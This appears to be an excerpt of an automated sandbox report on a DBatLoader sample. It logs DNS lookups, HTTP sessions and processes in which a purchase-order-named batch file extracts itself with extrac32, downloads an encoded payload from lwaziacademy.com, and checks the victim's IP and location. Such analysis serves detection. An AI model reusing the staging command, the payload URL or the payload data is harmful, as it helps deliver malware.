                                                                                                                                            Jan 3, 2025 20:39:57.435594082 CET1.1.1.1192.168.2.50x8f6bNo error (0)lwaziacademy.com41.185.8.252A (IP address)IN (0x0001)false
                                                                                                                                            Jan 3, 2025 20:40:05.286645889 CET1.1.1.1192.168.2.50x3ebfNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 3, 2025 20:40:05.286645889 CET1.1.1.1192.168.2.50x3ebfNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                            Jan 3, 2025 20:40:05.286645889 CET1.1.1.1192.168.2.50x3ebfNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                            Jan 3, 2025 20:40:05.286645889 CET1.1.1.1192.168.2.50x3ebfNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                            Jan 3, 2025 20:40:05.286645889 CET1.1.1.1192.168.2.50x3ebfNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                            Jan 3, 2025 20:40:05.286645889 CET1.1.1.1192.168.2.50x3ebfNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                            Jan 3, 2025 20:40:15.969821930 CET1.1.1.1192.168.2.50x8787No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                            Jan 3, 2025 20:40:15.969821930 CET1.1.1.1192.168.2.50x8787No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                            Jan 3, 2025 20:40:32.937082052 CET1.1.1.1192.168.2.50x3628Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                            Jan 3, 2025 20:40:34.335623980 CET1.1.1.1192.168.2.50x525eName error (3)212.20.149.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                            • lwaziacademy.com
                                                                                                                                            • reallyfreegeoip.org
                                                                                                                                            • checkip.dyndns.org
                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.549706158.101.44.242806004C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 3, 2025 20:40:05.328372955 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 3, 2025 20:40:14.460736036 CET321INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 03 Jan 2025 19:40:14 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Request-ID: cc73770b3322fc4e720f575af988ab43
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                            Jan 3, 2025 20:40:14.511964083 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Jan 3, 2025 20:40:15.852946043 CET321INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 03 Jan 2025 19:40:15 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Request-ID: 011b740a3fe3644eaca90c23c49dd578
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.54970541.185.8.2524432788C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-03 19:39:58 UTC169OUTGET /wps/200_Oupzhkprnvw HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                            Host: lwaziacademy.com
                                                                                                                                            2025-01-03 19:39:59 UTC182INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Fri, 03 Jan 2025 19:39:58 GMT
                                                                                                                                            Content-Length: 906612
                                                                                                                                            Connection: close
                                                                                                                                            Last-Modified: Fri, 20 Dec 2024 10:43:30 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2025-01-03 19:39:59 UTC15178INData Raw: 68 59 32 45 4f 41 4b 47 6b 43 72 2f 2f 76 72 74 2f 41 62 33 2f 41 54 74 41 66 54 74 39 51 55 43 38 50 66 74 37 76 30 41 41 50 54 76 2f 66 73 44 38 2f 66 74 2b 66 50 39 2b 76 6f 45 38 76 54 35 41 2f 48 75 2f 50 49 45 42 66 6b 46 39 77 62 76 39 41 62 31 2b 77 51 46 2f 76 44 76 41 4f 33 31 39 66 6a 7a 42 76 76 35 2b 75 2f 79 2f 66 44 34 2f 66 34 47 38 66 4c 30 41 76 62 30 37 2f 37 35 2b 34 57 4e 68 44 67 43 68 70 41 71 4f 51 48 38 42 76 54 33 2f 50 37 36 41 67 4f 46 6a 59 51 34 41 6f 61 51 4b 72 2b 37 70 70 65 49 7a 63 58 56 79 74 48 43 71 4d 54 44 7a 72 7a 4f 31 4a 2b 61 68 39 66 51 76 63 2f 42 32 4b 33 4b 78 63 62 56 79 37 36 6d 6a 6f 44 4a 78 4d 4b 37 7a 63 75 77 79 64 54 4f 31 63 6e 55 75 70 6d 51 7a 63 50 41 79 73 6d 37 6e 4d 62 51 78 74 6e 5a 32 5a 32
                                                                                                                                            Data Ascii: hY2EOAKGkCr//vrt/Ab3/ATtAfTt9QUC8Pft7v0AAPTv/fsD8/ft+fP9+voE8vT5A/Hu/PIEBfkF9wbv9Ab1+wQF/vDvAO319fjzBvv5+u/y/fD4/f4G8fL0Avb07/75+4WNhDgChpAqOQH8BvT3/P76AgOFjYQ4AoaQKr+7ppeIzcXVytHCqMTDzrzO1J+ah9fQvc/B2K3KxcbVy76mjoDJxMK7zcuwydTO1cnUupmQzcPAysm7nMbQxtnZ2Z2
                                                                                                                                            2025-01-03 19:39:59 UTC16384INData Raw: 45 6f 35 64 57 37 71 43 52 42 39 77 79 2b 61 43 78 47 51 68 65 4f 61 52 72 33 56 34 32 6e 78 41 73 39 76 71 49 6b 55 50 48 45 51 65 48 4b 57 48 54 6a 67 50 31 66 66 52 76 4e 61 4e 43 48 75 44 38 4a 68 42 31 59 4d 7a 57 4e 6b 33 66 2b 59 4e 55 32 4d 62 51 45 2f 57 6d 71 68 37 62 35 30 58 73 73 65 4f 39 79 73 36 30 61 65 4c 41 6f 39 48 66 78 6c 69 30 55 49 63 69 71 45 70 44 4b 4e 75 59 34 45 6d 41 33 71 2f 59 78 78 57 4e 64 30 4b 53 64 55 4b 57 7a 71 4e 5a 2f 49 69 4d 4f 62 38 4b 57 34 61 41 54 39 6e 6a 4a 66 35 4f 77 47 4e 37 77 4b 6f 55 52 2b 43 54 59 51 34 75 57 6a 36 76 4a 4d 41 47 4b 79 73 6f 71 54 70 38 35 56 47 4b 4b 53 63 43 55 63 31 38 72 7a 45 2b 4f 6c 51 49 47 43 63 4b 70 37 6c 63 65 4f 38 4c 65 47 37 2f 4f 49 41 2b 63 4d 31 39 64 45 31 72 4a 79
                                                                                                                                            Data Ascii: Eo5dW7qCRB9wy+aCxGQheOaRr3V42nxAs9vqIkUPHEQeHKWHTjgP1ffRvNaNCHuD8JhB1YMzWNk3f+YNU2MbQE/Wmqh7b50XsseO9ys60aeLAo9Hfxli0UIciqEpDKNuY4EmA3q/YxxWNd0KSdUKWzqNZ/IiMOb8KW4aAT9njJf5OwGN7wKoUR+CTYQ4uWj6vJMAGKysoqTp85VGKKScCUc18rzE+OlQIGCcKp7lceO8LeG7/OIA+cM19dE1rJy
                                                                                                                                            2025-01-03 19:39:59 UTC16384INData Raw: 73 55 4a 2b 69 53 31 77 49 71 64 42 31 2b 34 66 66 6a 71 42 58 43 56 65 65 4d 73 51 2b 47 71 44 4e 69 49 5a 78 5a 73 67 38 4e 32 52 73 37 77 57 47 48 78 45 46 65 77 59 38 6d 52 53 46 78 49 63 33 55 44 46 4b 67 64 4d 6e 71 42 41 52 6c 52 32 76 59 50 45 4a 64 36 79 75 6c 76 61 77 53 2f 66 7a 5a 6f 46 38 77 79 57 52 38 55 50 61 52 41 35 56 59 51 43 46 74 30 4c 62 47 4a 77 37 49 49 55 57 65 51 4b 72 44 52 44 56 45 65 45 49 66 5a 65 79 43 61 2f 75 6e 67 70 45 73 62 59 62 65 64 32 78 4d 47 5a 4f 2f 71 2b 48 77 46 55 38 58 50 52 4e 41 67 4a 6a 31 67 46 37 6e 4c 61 77 41 2f 5a 5a 37 2f 42 6d 78 34 38 62 33 4e 47 6c 6a 39 6f 7a 41 2f 51 78 48 2b 2f 31 32 48 4f 71 48 4a 54 75 43 37 52 35 4a 54 63 41 6b 68 48 55 36 41 4a 6d 62 34 5a 46 63 6d 45 75 44 49 37 65 37 6c
                                                                                                                                            Data Ascii: sUJ+iS1wIqdB1+4ffjqBXCVeeMsQ+GqDNiIZxZsg8N2Rs7wWGHxEFewY8mRSFxIc3UDFKgdMnqBARlR2vYPEJd6yulvawS/fzZoF8wyWR8UPaRA5VYQCFt0LbGJw7IIUWeQKrDRDVEeEIfZeyCa/ungpEsbYbed2xMGZO/q+HwFU8XPRNAgJj1gF7nLawA/ZZ7/Bmx48b3NGlj9ozA/QxH+/12HOqHJTuC7R5JTcAkhHU6AJmb4ZFcmEuDI7e7l
                                                                                                                                            2025-01-03 19:39:59 UTC16384INData Raw: 37 65 47 75 37 41 55 75 4e 79 76 4a 41 56 72 72 67 6f 61 33 32 5a 58 5a 47 46 74 67 2b 66 61 2f 72 78 48 71 2b 46 66 6d 70 54 73 2f 72 34 62 75 6f 38 51 39 45 43 46 39 36 4e 4f 2f 54 70 6f 59 6b 70 67 78 4b 4d 6f 68 4a 41 6f 5a 45 37 6c 6e 2b 50 76 50 4b 4f 65 56 72 54 4f 43 58 62 6d 77 76 57 47 61 38 32 45 61 41 74 72 57 65 71 64 6e 41 75 72 32 72 6a 66 79 64 52 76 76 70 6c 79 7a 32 50 39 4d 58 4c 35 58 33 66 2b 31 48 54 51 47 6c 39 73 31 44 41 45 5a 6c 6a 62 72 54 71 53 30 72 73 4a 30 50 69 4a 4d 59 6a 69 73 79 49 6b 4b 74 6f 58 63 5a 2b 50 45 4b 54 32 58 70 32 6b 36 50 53 2f 70 6b 42 66 45 38 7a 59 6f 47 74 34 67 58 48 75 6e 6a 30 4c 43 7a 51 39 76 34 68 33 2b 37 42 54 63 43 39 4f 59 76 6b 76 6c 38 42 4a 45 6d 48 38 74 56 4c 4f 79 46 6c 51 51 70 68 39
                                                                                                                                            Data Ascii: 7eGu7AUuNyvJAVrrgoa32ZXZGFtg+fa/rxHq+FfmpTs/r4buo8Q9ECF96NO/TpoYkpgxKMohJAoZE7ln+PvPKOeVrTOCXbmwvWGa82EaAtrWeqdnAur2rjfydRvvplyz2P9MXL5X3f+1HTQGl9s1DAEZljbrTqS0rsJ0PiJMYjisyIkKtoXcZ+PEKT2Xp2k6PS/pkBfE8zYoGt4gXHunj0LCzQ9v4h3+7BTcC9OYvkvl8BJEmH8tVLOyFlQQph9
                                                                                                                                            2025-01-03 19:39:59 UTC16384INData Raw: 44 30 69 74 37 42 70 71 6c 6b 49 2b 76 44 67 69 4d 72 34 4e 77 33 4d 66 53 43 5a 58 2b 65 69 43 77 78 72 5a 75 4f 50 46 42 7a 4e 76 47 76 4f 74 54 53 78 71 74 39 39 44 6d 61 36 6f 34 37 67 4e 39 73 6a 79 5a 35 64 69 54 67 41 63 37 50 65 36 39 71 69 6d 50 4e 69 78 4c 6a 65 6e 6e 31 79 5a 6b 5a 37 75 45 6d 70 36 69 6a 78 45 7a 34 69 4d 62 67 58 56 46 54 57 31 37 59 4a 63 4a 50 32 72 57 41 62 6f 74 53 57 51 32 6d 62 44 6c 69 5a 34 66 5a 66 6f 33 66 39 4c 51 41 65 39 67 62 66 66 68 56 4d 67 4b 55 58 7a 7a 53 35 6c 36 52 6f 39 61 57 67 2f 4b 56 63 41 51 57 4f 46 68 79 44 61 50 79 35 79 63 67 4a 63 4f 62 4f 42 35 4d 5a 70 52 36 47 61 6d 4d 54 36 65 78 2f 61 66 41 54 59 62 6b 4c 6c 38 31 35 48 6f 61 7a 76 4f 6c 75 56 4d 2f 49 34 70 52 6e 67 47 68 44 4e 4a 78 4e
                                                                                                                                            Data Ascii: D0it7BpqlkI+vDgiMr4Nw3MfSCZX+eiCwxrZuOPFBzNvGvOtTSxqt99Dma6o47gN9sjyZ5diTgAc7Pe69qimPNixLjenn1yZkZ7uEmp6ijxEz4iMbgXVFTW17YJcJP2rWAbotSWQ2mbDliZ4fZfo3f9LQAe9gbffhVMgKUXzzS5l6Ro9aWg/KVcAQWOFhyDaPy5ycgJcObOB5MZpR6GamMT6ex/afATYbkLl815HoazvOluVM/I4pRngGhDNJxN
                                                                                                                                            2025-01-03 19:39:59 UTC16384INData Raw: 4f 45 64 76 70 2b 78 66 39 70 63 43 79 6e 57 4f 4c 63 63 34 6d 73 51 75 76 69 53 45 77 78 32 67 45 35 43 51 45 30 74 72 53 44 6e 33 52 63 62 63 48 37 6b 37 49 4f 70 46 71 4a 67 49 4f 47 41 7a 63 69 66 37 5a 68 31 55 42 67 54 34 6d 65 55 74 32 61 69 54 79 6f 65 61 50 7a 39 35 34 42 4b 4d 49 4d 6f 6e 63 4a 2f 56 44 4e 42 32 71 35 66 7a 46 6a 4e 4f 75 45 74 65 64 73 34 4d 6f 45 2b 64 75 42 78 49 52 6b 47 38 6d 73 2b 65 69 6e 32 67 70 6f 61 44 32 64 45 70 61 79 75 68 52 44 51 2b 48 76 78 4e 34 49 64 45 69 72 4a 36 32 66 51 33 39 76 54 59 69 61 70 78 73 76 50 71 79 4e 57 52 66 32 37 2b 4c 74 79 2b 76 30 41 79 6a 42 36 32 45 39 68 2f 42 39 31 55 31 6c 63 6f 5a 39 6f 6c 74 74 30 65 76 52 77 58 34 5a 47 6d 52 69 51 39 68 6c 71 48 54 55 44 4d 61 43 4c 79 72 55 61
                                                                                                                                            Data Ascii: OEdvp+xf9pcCynWOLcc4msQuviSEwx2gE5CQE0trSDn3RcbcH7k7IOpFqJgIOGAzcif7Zh1UBgT4meUt2aiTyoeaPz954BKMIMoncJ/VDNB2q5fzFjNOuEteds4MoE+duBxIRkG8ms+ein2gpoaD2dEpayuhRDQ+HvxN4IdEirJ62fQ39vTYiapxsvPqyNWRf27+Lty+v0AyjB62E9h/B91U1lcoZ9oltt0evRwX4ZGmRiQ9hlqHTUDMaCLyrUa
                                                                                                                                            2025-01-03 19:39:59 UTC16384INData Raw: 63 70 36 33 79 31 68 61 6d 38 55 45 6e 76 66 61 58 71 56 4a 73 73 4c 2f 74 52 67 35 32 72 49 54 68 33 4b 56 56 2b 44 52 2f 32 48 44 44 54 58 4c 34 57 6d 4a 74 77 41 77 7a 73 31 65 66 5a 46 6e 70 42 61 4b 54 58 4e 76 76 4b 72 46 58 58 79 55 64 57 66 6f 47 69 6a 66 5a 33 58 6d 73 71 63 47 69 6b 68 34 49 34 4f 71 33 65 4f 61 51 39 37 32 6b 78 55 4b 4d 69 32 31 75 76 37 55 59 57 64 57 6e 67 71 69 54 39 43 51 4a 2f 55 61 66 72 33 39 44 31 74 65 36 66 4a 75 56 6a 48 75 4c 65 41 6d 6e 2b 7a 6d 36 57 57 59 33 71 4a 42 4e 71 50 4f 51 6e 42 53 31 47 41 36 43 49 61 54 4e 72 6d 44 31 68 56 58 4a 71 69 4b 4c 34 77 39 35 66 66 67 61 35 51 44 38 32 56 50 4c 67 77 6a 43 47 4a 6e 79 79 49 72 70 66 48 6a 50 66 4a 36 49 44 64 43 31 41 54 6f 41 69 62 67 5a 7a 2f 68 38 44 48
                                                                                                                                            Data Ascii: cp63y1ham8UEnvfaXqVJssL/tRg52rITh3KVV+DR/2HDDTXL4WmJtwAwzs1efZFnpBaKTXNvvKrFXXyUdWfoGijfZ3XmsqcGikh4I4Oq3eOaQ972kxUKMi21uv7UYWdWngqiT9CQJ/Uafr39D1te6fJuVjHuLeAmn+zm6WWY3qJBNqPOQnBS1GA6CIaTNrmD1hVXJqiKL4w95ffga5QD82VPLgwjCGJnyyIrpfHjPfJ6IDdC1AToAibgZz/h8DH
                                                                                                                                            2025-01-03 19:39:59 UTC16384INData Raw: 62 70 59 39 65 30 39 6b 4e 75 46 2f 61 54 62 78 4a 2f 78 33 6b 6a 44 33 64 6e 36 6e 33 34 38 49 55 71 4f 62 2b 6a 78 34 45 2f 32 78 42 31 4c 6a 68 55 72 56 51 4f 4b 71 69 39 36 4a 56 42 47 35 6c 57 39 47 49 6a 30 65 66 35 58 2b 6a 38 63 64 53 71 44 55 73 68 4a 59 46 44 37 71 48 44 44 38 62 2f 6c 4a 48 4a 4b 2b 70 6b 6e 4f 79 6d 6b 31 78 6a 37 49 76 52 74 75 43 50 4a 5a 6e 65 71 41 33 58 51 62 6c 71 64 34 79 38 44 70 64 51 62 7a 4e 54 79 34 58 2b 71 67 33 4d 73 4a 47 4e 32 49 35 74 63 2b 50 54 41 44 6c 48 4b 50 61 59 67 6c 72 5a 48 31 56 2f 6e 6b 58 2f 32 2f 65 2b 4b 6a 6f 41 54 76 44 42 4f 65 71 48 2f 4f 43 77 43 77 63 74 2f 6c 4a 73 71 6b 6f 66 64 4a 42 74 31 33 46 43 51 36 6f 71 68 47 74 48 36 67 6b 68 5a 55 31 76 4d 74 57 63 70 61 41 54 79 36 33 38 72
                                                                                                                                            Data Ascii: bpY9e09kNuF/aTbxJ/x3kjD3dn6n348IUqOb+jx4E/2xB1LjhUrVQOKqi96JVBG5lW9GIj0ef5X+j8cdSqDUshJYFD7qHDD8b/lJHJK+pknOymk1xj7IvRtuCPJZneqA3XQblqd4y8DpdQbzNTy4X+qg3MsJGN2I5tc+PTADlHKPaYglrZH1V/nkX/2/e+KjoATvDBOeqH/OCwCwct/lJsqkofdJBt13FCQ6oqhGtH6gkhZU1vMtWcpaATy638r
                                                                                                                                            2025-01-03 19:39:59 UTC16384INData Raw: 64 53 73 6b 6a 72 6d 2f 43 32 38 4d 41 4e 66 64 59 4d 6d 4e 71 37 6a 67 43 63 65 66 2b 4d 6e 69 37 34 4f 33 56 47 33 6a 49 75 6c 5a 44 69 55 4f 55 71 37 50 70 47 67 59 75 75 75 53 6d 65 56 73 4b 69 62 53 54 64 49 62 6e 77 35 42 34 67 41 75 52 4c 68 53 70 41 37 33 70 71 33 38 6a 31 52 54 31 58 62 42 57 32 73 68 32 7a 52 77 46 61 5a 42 64 6a 7a 42 2f 4c 6f 54 56 2b 35 37 62 42 50 52 74 74 5a 64 74 39 49 32 67 4f 39 51 46 70 64 33 41 4f 58 71 33 62 46 42 30 4a 58 41 6f 36 6e 76 65 48 44 49 58 51 6d 44 66 57 73 5a 5a 42 64 33 70 73 76 72 49 34 43 50 66 2f 4b 49 35 76 77 75 79 46 74 4f 31 70 48 37 4b 30 2b 76 34 71 79 4a 4e 44 42 57 42 54 73 4b 34 79 73 49 67 79 4c 48 31 63 47 4e 58 5a 2f 6b 77 65 4d 4d 6f 72 7a 66 38 4d 45 78 70 42 32 5a 70 39 4a 56 41 43 47
                                                                                                                                            Data Ascii: dSskjrm/C28MANfdYMmNq7jgCcef+Mni74O3VG3jIulZDiUOUq7PpGgYuuuSmeVsKibSTdIbnw5B4gAuRLhSpA73pq38j1RT1XbBW2sh2zRwFaZBdjzB/LoTV+57bBPRttZdt9I2gO9QFpd3AOXq3bFB0JXAo6nveHDIXQmDfWsZZBd3psvrI4CPf/KI5vwuyFtO1pH7K0+v4qyJNDBWBTsK4ysIgyLH1cGNXZ/kweMMorzf8MExpB2Zp9JVACG
                                                                                                                                            2025-01-03 19:39:59 UTC16384INData Raw: 42 67 31 77 64 52 4d 31 36 71 56 70 75 76 54 66 7a 36 4c 72 62 36 44 35 62 69 36 47 4c 69 74 72 69 4d 36 30 55 41 4b 46 6e 41 35 73 64 49 6a 76 54 2f 4b 58 70 77 5a 79 65 63 4e 54 54 42 4c 58 57 4f 59 52 72 53 76 4e 70 67 41 6a 39 4e 6b 35 68 30 2f 41 46 74 4a 2b 39 57 64 56 38 43 4b 38 45 33 72 63 6d 6f 69 52 6a 57 70 53 78 59 62 43 73 59 52 68 69 69 54 70 68 37 66 4c 54 47 33 2b 68 4c 51 63 46 67 49 31 37 4e 70 44 32 4f 45 62 72 4e 36 43 33 63 70 36 75 71 4f 36 6b 76 63 36 64 4a 31 69 4f 38 48 56 2b 4f 77 63 63 32 39 30 36 39 31 61 52 5a 44 32 31 36 33 63 4c 6b 34 53 2f 54 42 6b 6e 57 55 4b 47 68 62 68 35 6f 69 49 42 79 4a 67 72 6e 53 55 75 66 4f 55 38 75 79 32 48 67 36 75 6c 45 4e 43 36 71 57 4a 47 52 4d 54 63 31 4e 30 69 73 30 41 70 43 52 71 64 62 6d
                                                                                                                                            Data Ascii: Bg1wdRM16qVpuvTfz6Lrb6D5bi6GLitriM60UAKFnA5sdIjvT/KXpwZyecNTTBLXWOYRrSvNpgAj9Nk5h0/AFtJ+9WdV8CK8E3rcmoiRjWpSxYbCsYRhiiTph7fLTG3+hLQcFgI17NpD2OEbrN6C3cp6uqO6kvc6dJ1iO8HV+Owcc290691aRZD2163cLk4S/TBknWUKGhbh5oiIByJgrnSUufOU8uy2Hg6ulENC6qWJGRMTc1N0is0ApCRqdbm


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.549708188.114.96.34436004C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-03 19:40:16 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-03 19:40:16 UTC857INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 03 Jan 2025 19:40:16 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 1248005
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y1518jklZAXaQz9txWutp%2BUVAC88TxWJM777aCih4ERiYlQsCQJG4e5cF%2BdalO2uh3f7OBWduIdWR5%2B5lmP3IQxdD1P90BS89y2sZ%2B9YHJyYfNjL882dRrhk3FhO4NGFdvfLsR9M"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8fc575ac4b1542e7-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2552&min_rtt=2538&rtt_var=980&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1100640&cwnd=242&unsent_bytes=0&cid=c26b889a0a133f00&ts=239&x=0"
                                                                                                                                            2025-01-03 19:40:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Click to jump to process

                                                                                                                                            Click to jump to process

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Click to jump to process

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:14:39:54
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#5_Tower_049.bat" "
                                                                                                                                            Imagebase:0x7ff6a4e80000
                                                                                                                                            File size:289'792 bytes
                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:1
                                                                                                                                            Start time:14:39:54
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:2
                                                                                                                                            Start time:14:39:54
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Windows\System32\extrac32.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:extrac32 /y "C:\Users\user\Desktop\PO#5_Tower_049.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                                            Imagebase:0x7ff7f75d0000
                                                                                                                                            File size:35'328 bytes
                                                                                                                                            MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:4
                                                                                                                                            Start time:14:39:55
                                                                                                                                            Start date:03/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:1'242'624 bytes
                                                                                                                                            MD5 hash:EE363121466EE051042410AFFFEA28EF
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.2105851599.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
